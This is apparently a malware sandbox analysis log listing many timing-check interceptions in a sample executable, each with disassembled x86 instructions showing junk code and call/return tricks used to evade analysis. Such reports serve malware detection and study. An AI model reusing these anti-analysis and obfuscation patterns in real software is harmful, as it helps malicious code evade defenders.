Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62607 second address: C62624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FC19CEC1DCCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FC19CEC1DC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C640C8 second address: C640CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C640CC second address: C64140 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FC19CEC1DC8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edi, 4CF4EA56h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FC19CEC1DC8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 push 00000000h 0x0000004a jmp 00007FC19CEC1DD6h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jns 00007FC19CEC1DC8h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64140 second address: C6414A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC19D472F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C39 second address: C64C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C3E second address: C64C55 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC19D472F28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FC19D472F26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C55 second address: C64C5F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C64C5F second address: C64C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6547D second address: C65490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C65F4B second address: C65F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C66CCB second address: C66CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C676A8 second address: C676BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C676BA second address: C676D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C676D5 second address: C676E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC19D472F26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6745E second address: C67464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C67464 second address: C67468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9A1 second address: C6A9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9A7 second address: C6A9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9AB second address: C6A9BD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9BD second address: C6A9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6A9C1 second address: C6A9C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA6C second address: C6BA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA70 second address: C6BA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA74 second address: C6BA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6ABC7 second address: C6ABDE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC19CEC1DC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FC19CEC1DDAh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA7A second address: C6BA84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC19D472F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA84 second address: C6BA91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6BA91 second address: C6BB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F30h 0x00000009 popad 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC19D472F28h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2D70h], edi 0x0000002c jmp 00007FC19D472F2Eh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FC19D472F28h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D1D2Ah], edx 0x00000053 mov ebx, dword ptr [ebp+1246DC1Dh] 0x00000059 push 00000000h 0x0000005b add di, B24Ch 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6CAE8 second address: C6CAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6CAEC second address: C6CAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6DDFC second address: C6DE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6DE14 second address: C6DE18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDA9 second address: C6EDBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC19CEC1DCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1A148 second address: C1A14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1A14C second address: C1A150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDBA second address: C6EDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FC19D472F2Bh 0x00000010 jmp 00007FC19D472F35h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDE6 second address: C6EDED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6EDED second address: C6EE89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, dword ptr [ebp+122D2B05h] 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jmp 00007FC19D472F31h 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007FC19D472F28h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b mov eax, dword ptr [ebp+122D1275h] 0x00000041 push edi 0x00000042 pop ebx 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007FC19D472F28h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f mov ebx, dword ptr [ebp+122D36B9h] 0x00000065 movsx ebx, bx 0x00000068 nop 0x00000069 js 00007FC19D472F3Fh 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FC19D472F2Dh 0x00000076 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7134C second address: C71350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C7144C second address: C71450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C740DD second address: C740EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DCAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB1A75 second address: CB1A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB1A79 second address: CB1A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5069 second address: CB506D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB51E5 second address: CB51EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB51EB second address: CB51F7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC19CEC1DCEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5332 second address: CB5351 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007FC19D472F26h 0x00000011 jne 00007FC19D472F26h 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5351 second address: CB5359 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB561C second address: CB5620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5620 second address: CB5626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5626 second address: CB562C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB562C second address: CB5636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC19CEC1DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5636 second address: CB565B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC19D472F2Bh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB565B second address: CB5660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB5660 second address: CB566D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC19D472F28h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB57A1 second address: CB57AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CB597B second address: CB597F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1CA second address: CBB1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1D0 second address: CBB1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC19D472F2Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1E5 second address: CBB1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1ED second address: CBB1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB1F1 second address: CBB1F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB495 second address: CBB4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007FC19D472F2Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC19D472F2Dh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB903 second address: CBB916 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB916 second address: CBB93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC19D472F3Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB93B second address: CBB941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB941 second address: CBB945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CBB945 second address: CBB95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b js 00007FC19CEC1DC6h 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69599 second address: C6959F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC3885 second address: CC388C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC388C second address: CC3901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC19D472F39h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnl 00007FC19D472F26h 0x00000010 jmp 00007FC19D472F33h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jnc 00007FC19D472F3Bh 0x0000001f push ecx 0x00000020 jmp 00007FC19D472F2Fh 0x00000025 jnc 00007FC19D472F26h 0x0000002b pop ecx 0x0000002c js 00007FC19D472F2Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C69990 second address: C699AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC19CEC1DD7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC44D5 second address: CC44E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC19D472F26h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC44E4 second address: CC44E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC44E8 second address: CC4503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jmp 00007FC19D472F2Eh 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B50 second address: CC4B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B57 second address: CC4B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B60 second address: CC4B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC4B64 second address: CC4B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC9B53 second address: CC9B78 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC19CEC1DDBh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CC9B78 second address: CC9B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB19 second address: CCDB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FC19CEC1DCCh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB30 second address: CCDB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB41 second address: CCDB45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB45 second address: CCDB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB50 second address: CCDB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCDB5A second address: CCDB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCCFDD second address: CCCFE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCCFE3 second address: CCCFFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F33h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCCFFB second address: CCD001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCD447 second address: CCD44B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
